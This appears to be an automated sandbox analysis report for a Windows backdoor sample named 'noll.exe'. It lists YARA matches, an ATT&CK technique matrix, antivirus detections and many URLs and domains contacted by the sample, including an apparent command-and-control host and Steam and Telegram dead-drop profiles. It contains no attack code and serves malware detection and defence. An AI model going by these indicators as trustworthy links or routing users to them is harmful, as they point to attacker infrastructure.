                            Source: Yara matchFile source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: noll.exe PID: 3636, type: MEMORYSTR
                            Source: Yara matchFile source: noll.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.noll.exe.80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.noll.exe.80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2036904978.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: noll.exe PID: 3636, type: MEMORYSTR
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                            Windows Management Instrumentation
                            1
                            DLL Side-Loading
                            1
                            DLL Side-Loading
                            1
                            Deobfuscate/Decode Files or Information
                            1
                            OS Credential Dumping
                            2
                            System Time Discovery
                            Remote Services1
                            Archive Collected Data
                            2
                            Ingress Tool Transfer
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Native API
                            Boot or Logon Initialization Scripts211
                            Process Injection
                            3
                            Obfuscated Files or Information
                            1
                            Credentials in Registry
                            1
                            Account Discovery
                            Remote Desktop Protocol1
                            Data from Local System
                            21
                            Encrypted Channel
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                            DLL Side-Loading
                            Security Account Manager3
                            File and Directory Discovery
                            SMB/Windows Admin SharesData from Network Shared Drive2
                            Non-Application Layer Protocol
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                            File Deletion
                            NTDS55
                            System Information Discovery
                            Distributed Component Object ModelInput Capture13
                            Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Masquerading
                            LSA Secrets1
                            Query Registry
                            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Virtualization/Sandbox Evasion
                            Cached Domain Credentials151
                            Security Software Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                            Process Injection
                            DCSync1
                            Virtualization/Sandbox Evasion
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
                            Process Discovery
                            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                            Application Window Discovery
                            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                            System Owner/User Discovery
                            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            noll.exe82%ReversingLabsWin32.Backdoor.Multiverze
                            noll.exe100%AviraTR/Redcap.paoab
                            noll.exe100%Joe Sandbox ML
                            No Antivirus matches
                            No Antivirus matches
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://cowod.hoptoref=0%Avira URL Cloudsafe
                            http://cowod.=cloudflare0%Avira URL Cloudsafe
                            http://cowod.hopto.ef=0%Avira URL Cloudsafe
                            http://cowod.hopto.orglass=0%Avira URL Cloudsafe
                            http://cowod.hoptoml0%Avira URL Cloudsafe
                            http://cowod.hopto.flare0%Avira URL Cloudsafe
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            steamcommunity.com
                            23.55.153.106
                            truefalse
                              high
                              t.me
                              149.154.167.99
                              truefalse
                                high
                                cowod.hopto.org
                                unknown
                                unknownfalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  https://t.me/ae5edfalse
                                    high
                                    https://steamcommunity.com/profiles/76561199780418869false
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&amnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                        high
                                        https://player.vimeo.comnoll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=englinoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                            high
                                            https://steamcommunity.com/profiles/76561199780418869Inoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305868410.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://steamcommunity.com/?subsection=broadcastsnoll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                high
                                                http://cowod.hopto.orgnoll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpfalse
                                                  high
                                                  https://store.steampowered.com/subscriber_agreement/noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                    high
                                                    https://www.gstatic.cn/recaptcha/noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://telegram.org/img/t_logo_2x.pngnoll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://steamcommunity.com/profiles/76561199780418869/badgesnoll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                          high
                                                          http://cowod.hoptoref=noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.valvesoftware.com/legal.htmnoll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                            high
                                                            https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&anoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                              high
                                                              https://www.youtube.comnoll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.google.comnoll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2Snoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                    high
                                                                    http://cowod.hopto.org_DEBUG.zip/cnoll.exefalse
                                                                      high
                                                                      https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=englnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                        high
                                                                        http://cowod.hopto.noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                          high
                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbacknoll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                            high
                                                                            https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0noll.exefalse
                                                                              high
                                                                              http://cowod.hoptonoll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                high
                                                                                https://s.ytimg.com;noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://cowod.=cloudflarenoll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                    high
                                                                                    https://steam.tv/noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://store.steampowered.com/privacy_agreement/noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                        high
                                                                                        https://store.steampowered.com/points/shop/noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                          high
                                                                                          https://sketchfab.comnoll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://lv.queniujq.cnnoll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://t.me/ae5edCnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.youtube.com/noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://store.steampowered.com/privacy_agreement/noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                    high
                                                                                                    https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=englinoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                      high
                                                                                                      https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=englinoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                          high
                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngnoll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                            high
                                                                                                            http://cowod.hopto.ef=noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarognoll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                              high
                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                high
                                                                                                                https://www.google.com/recaptcha/noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://checkout.steampowered.com/noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://t.me/ae5edjnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbSnoll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                        high
                                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bnoll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                          high
                                                                                                                          https://t.me/ae5edmnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&ampnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                              high
                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngnoll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                high
                                                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&ampnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/wnoll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://store.steampowered.com/;noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://t.me/ae5edgnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://community.cloudflare.steamstatic.com/publinoll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://store.steampowered.com/about/76561199780418869[1].htm.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://community.cloudflare.steamstatic.com/noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://steamcommunity.com/my/wishlist/noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://t.me/noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=76561199780418869[1].htm.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://web.telegram.orgnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbbnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://help.steampowered.com/en/noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://steamcommunity.com/market/noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/news/noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://cowod.hopto.orglass=noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&l=englisnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgnoll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                        high
